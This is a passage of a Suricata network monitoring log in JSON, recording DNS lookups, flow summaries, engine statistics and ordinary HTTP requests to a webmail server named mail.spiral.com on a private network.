{"timestamp":"2020-02-29T00:20:55.000254+0000","event_type":"stats","stats":{"uptime":14907,"capture":{"kernel_packets":137460,"kernel_drops":0},"decoder":{"pkts":137460,"bytes":94232530,"invalid":193,"ipv4":135909,"ipv6":10,"ethernet":137460,"raw":0,"null":0,"sll":0,"tcp":130403,"udp":5298,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":685,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7096480},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2840,"ssn_memcap_drop":0,"pseudo":348,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2856,"synack":2847,"rst":1207,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":147,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":25},"app_layer":{"flow":{"http":1875,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":106,"dcerpc_udp":0,"dns_udp":2425,"failed_udp":113},"tx":{"http":4804,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2507}},"flow_mgr":{"closed_pruned":2815,"new_pruned":17,"est_pruned":2478,"bypassed_pruned":0,"flows_checked":2,"flows_notimeout":2,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65529,"rows_empty":5,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":20501,"memcap_state":0,"memcap_global":0},"http":{"memuse":19094,"memcap":0}}} 
{"timestamp":"2020-02-29T00:20:55.135421+0000","flow_id":1792692210569469,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":45056,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":37860,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:20:55.246785+0000","flow_id":1792692210569469,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":45056,"proto":"UDP","dns":{"type":"answer","id":37860,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:20:55.246785+0000","flow_id":1792692210569469,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":45056,"proto":"UDP","dns":{"type":"answer","id":37860,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:20:55.315911+0000","flow_id":2248431190397810,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34900,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/imp\/viewPort","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":420}} {"timestamp":"2020-02-29T00:20:55.315911+0000","flow_id":2248431190397810,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.130","src_port":34900,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/imp\/viewPort","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":420},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/imp\/viewPort","state":"CLOSED","stored":false,"size":248,"tx_id":0}} {"timestamp":"2020-02-29T00:20:56.000605+0000","flow_id":787291901945212,"event_type":"flow","src_ip":"192.168.10.130","src_port":34888,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":5,"pkts_toclient":5,"bytes_toserver":1112,"bytes_toclient":890,"start":"2020-02-29T00:19:50.484732+0000","end":"2020-02-29T00:19:55.771502+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:20:56.000896+0000","flow_id":969742112447211,"event_type":"flow","src_ip":"192.168.10.130","src_port":34886,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":29,"pkts_toclient":34,"bytes_toserver":4321,"bytes_toclient":36752,"start":"2020-02-29T00:19:46.449259+0000","end":"2020-02-29T00:19:55.763745+0000","age":9,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:21:00.316893+0000","flow_id":2248431190397810,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34900,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/imp\/viewPort","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":420},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/imp\/viewPort","state":"CLOSED","stored":false,"size":784,"tx_id":0}} {"timestamp":"2020-02-29T00:21:02.000253+0000","event_type":"stats","stats":{"uptime":14914,"capture":{"kernel_packets":137463,"kernel_drops":0},"decoder":{"pkts":137469,"bytes":94234978,"invalid":193,"ipv4":135918,"ipv6":10,"ethernet":137469,"raw":0,"null":0,"sll":0,"tcp":130410,"udp":5300,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":685,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7096480},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2841,"ssn_memcap_drop":0,"pseudo":348,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2857,"synack":2848,"rst":1207,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":147,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":25},"app_layer":{"flow":{"http":1876,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":106,"dcerpc_udp":0,"dns_udp":2426,"failed_udp":113},"tx":{"http":4805,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2508}},"flow_mgr":{"closed_pruned":2819,"new_pruned":17,"est_pruned":2478,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65536,"rows_empty":0,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":20832,"memcap_state"
:0,"memcap_global":0},"http":{"memuse":19014,"memcap":0}}} {"timestamp":"2020-02-29T00:21:03.000612+0000","flow_id":784388504545285,"event_type":"flow","src_ip":"192.168.10.130","src_port":34892,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":6,"pkts_toclient":4,"bytes_toserver":1070,"bytes_toclient":698,"start":"2020-02-29T00:19:57.387077+0000","end":"2020-02-29T00:20:02.578497+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:21:04.000653+0000","flow_id":1369582092931394,"event_type":"flow","src_ip":"192.168.10.81","src_port":52918,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":43,"pkts_toclient":40,"bytes_toserver":8611,"bytes_toclient":34906,"start":"2020-02-29T00:19:47.905538+0000","end":"2020-02-29T00:20:03.977950+0000","age":16,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:21:05.000382+0000","flow_id":1602206096945749,"event_type":"flow","src_ip":"192.168.10.122","src_port":60926,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:16:03.979541+0000","end":"2020-02-29T00:16:04.086107+0000","age":1,"state":"established","reason":"timeout","alerted":false}} 
{"timestamp":"2020-02-29T00:21:09.000186+0000","event_type":"stats","stats":{"uptime":14921,"capture":{"kernel_packets":137469,"kernel_drops":0},"decoder":{"pkts":137472,"bytes":94235176,"invalid":193,"ipv4":135921,"ipv6":10,"ethernet":137472,"raw":0,"null":0,"sll":0,"tcp":130413,"udp":5300,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":685,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7095616},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2841,"ssn_memcap_drop":0,"pseudo":348,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2857,"synack":2848,"rst":1207,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":147,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":25},"app_layer":{"flow":{"http":1876,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":106,"dcerpc_udp":0,"dns_udp":2426,"failed_udp":113},"tx":{"http":4805,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2508}},"flow_mgr":{"closed_pruned":2821,"new_pruned":17,"est_pruned":2479,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65536,"rows_empty":0,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":20502,"memcap_state":0,"memcap_global":0},"http":{"memuse":18854,"memcap":0}}} 
{"timestamp":"2020-02-29T00:21:11.000855+0000","flow_id":2077710532005367,"event_type":"flow","src_ip":"192.168.10.81","src_port":52922,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":10,"pkts_toclient":11,"bytes_toserver":1954,"bytes_toclient":6224,"start":"2020-02-29T00:20:04.445943+0000","end":"2020-02-29T00:20:10.267899+0000","age":6,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:21:12.088636+0000","flow_id":1751078273571388,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":33195,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":35784,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:21:12.197781+0000","flow_id":1751078273571388,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":33195,"proto":"UDP","dns":{"type":"answer","id":35784,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:21:12.197781+0000","flow_id":1751078273571388,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":33195,"proto":"UDP","dns":{"type":"answer","id":35784,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:21:12.344766+0000","flow_id":24883672652726,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52938,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":8202}} {"timestamp":"2020-02-29T00:21:14.000206+0000","flow_id":144498492304586,"event_type":"flow","src_ip":"192.168.10.122","src_port":58932,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:16:13.650442+0000","end":"2020-02-29T00:16:13.758493+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:21:16.000229+0000","event_type":"stats","stats":{"uptime":14928,"capture":{"kernel_packets":137475,"kernel_drops":0},"decoder":{"pkts":137492,"bytes":94245717,"invalid":193,"ipv4":135941,"ipv6":10,"ethernet":137492,"raw":0,"null":0,"sll":0,"tcp":130429,"udp":5304,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":685,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7095904},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2842,"ssn_memcap_drop":0,"pseudo":348,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2858,"synack":2849,"rst":1207,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":147,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":25},"app_layer":{"flow":{"http":1877,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":106,"dcerpc_udp":0,"dns_udp":2427,"failed_udp":114},"tx":{"http":4806,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2509}},"flow_mgr":{"clos
ed_pruned":2822,"new_pruned":17,"est_pruned":2479,"bypassed_pruned":0,"flows_checked":1,"flows_notimeout":1,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65535,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":20501,"memcap_state":0,"memcap_global":0},"http":{"memuse":104401,"memcap":0}}} {"timestamp":"2020-02-29T00:21:17.200064+0000","flow_id":24883672652726,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52938,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":8202},"app_proto":"http","fileinfo":{"filename":"\/services\/portal\/","state":"CLOSED","stored":false,"size":48902,"tx_id":0}} {"timestamp":"2020-02-29T00:21:17.208063+0000","flow_id":1098183115353279,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":57780,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":64597,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:21:17.319419+0000","flow_id":1098183115353279,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":57780,"proto":"UDP","dns":{"type":"answer","id":64597,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:21:17.319419+0000","flow_id":1098183115353279,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":57780,"proto":"UDP","dns":{"type":"answer","id":64597,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} 
{"timestamp":"2020-02-29T00:21:17.386661+0000","flow_id":24883672652726,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52938,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/nag\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":8360}} {"timestamp":"2020-02-29T00:21:17.425113+0000","flow_id":24883672652726,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52938,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/nag\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":8360},"app_proto":"http","fileinfo":{"filename":"\/nag\/","state":"CLOSED","stored":false,"size":37397,"tx_id":1}} {"timestamp":"2020-02-29T00:21:17.440353+0000","flow_id":24883672652726,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52938,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/nag\/themes\/default\/screen.css","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/css","http_refer":"http:\/\/mail.spiral.com\/nag\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":813}} 
{"timestamp":"2020-02-29T00:21:17.442545+0000","flow_id":24883672652726,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52938,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/nag\/themes\/default\/screen.css","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/css","http_refer":"http:\/\/mail.spiral.com\/nag\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":813},"app_proto":"http","fileinfo":{"filename":"\/nag\/themes\/default\/screen.css","state":"CLOSED","stored":false,"size":2235,"tx_id":2}} {"timestamp":"2020-02-29T00:21:17.442807+0000","flow_id":24883672652726,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52938,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":3,"http":{"hostname":"mail.spiral.com","url":"\/js\/quickfinder.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/nag\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1159}} {"timestamp":"2020-02-29T00:21:17.459364+0000","flow_id":610635607832318,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52940,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/js\/sidebar.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/nag\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":744}} 
{"timestamp":"2020-02-29T00:21:17.460875+0000","flow_id":764176393698498,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52942,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/js\/redbox.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/nag\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1275}} {"timestamp":"2020-02-29T00:21:17.462601+0000","flow_id":24883672652726,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52938,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/quickfinder.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/nag\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1159},"app_proto":"http","fileinfo":{"filename":"\/js\/quickfinder.js","state":"CLOSED","stored":false,"size":3277,"tx_id":3}} {"timestamp":"2020-02-29T00:21:17.462956+0000","flow_id":24883672652726,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52938,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":4,"http":{"hostname":"mail.spiral.com","url":"\/js\/tables.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/nag\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2119}} 
{"timestamp":"2020-02-29T00:21:17.567336+0000","flow_id":764176393698498,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52942,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/redbox.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/nag\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1275},"app_proto":"http","fileinfo":{"filename":"\/js\/redbox.js","state":"CLOSED","stored":false,"size":4234,"tx_id":0}} {"timestamp":"2020-02-29T00:21:17.567589+0000","flow_id":764176393698498,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52942,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/tablehead-bg.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":74}} {"timestamp":"2020-02-29T00:21:17.569331+0000","flow_id":610635607832318,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52940,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/sidebar.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/nag\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":744},"app_proto":"http","fileinfo":{"filename":"\/js\/sidebar.js","state":"CLOSED","stored":false,"size":1978,"tx_id":0}} 
{"timestamp":"2020-02-29T00:21:17.569674+0000","flow_id":610635607832318,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52940,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/az.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":264}} {"timestamp":"2020-02-29T00:21:17.570872+0000","flow_id":764176393698498,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52942,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/tablehead-bg.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":74},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/tablehead-bg.png","state":"CLOSED","stored":false,"size":74,"tx_id":1}} {"timestamp":"2020-02-29T00:21:17.572992+0000","flow_id":24883672652726,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52938,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/tables.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/nag\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2119},"app_proto":"http","fileinfo":{"filename":"\/js\/tables.js","state":"CLOSED","stored":false,"size":6954,"tx_id":4}} 
{"timestamp":"2020-02-29T00:21:17.581785+0000","flow_id":24883672652726,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52938,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":5,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/tab.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":108}} {"timestamp":"2020-02-29T00:21:17.583865+0000","flow_id":24883672652726,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52938,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/tab.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 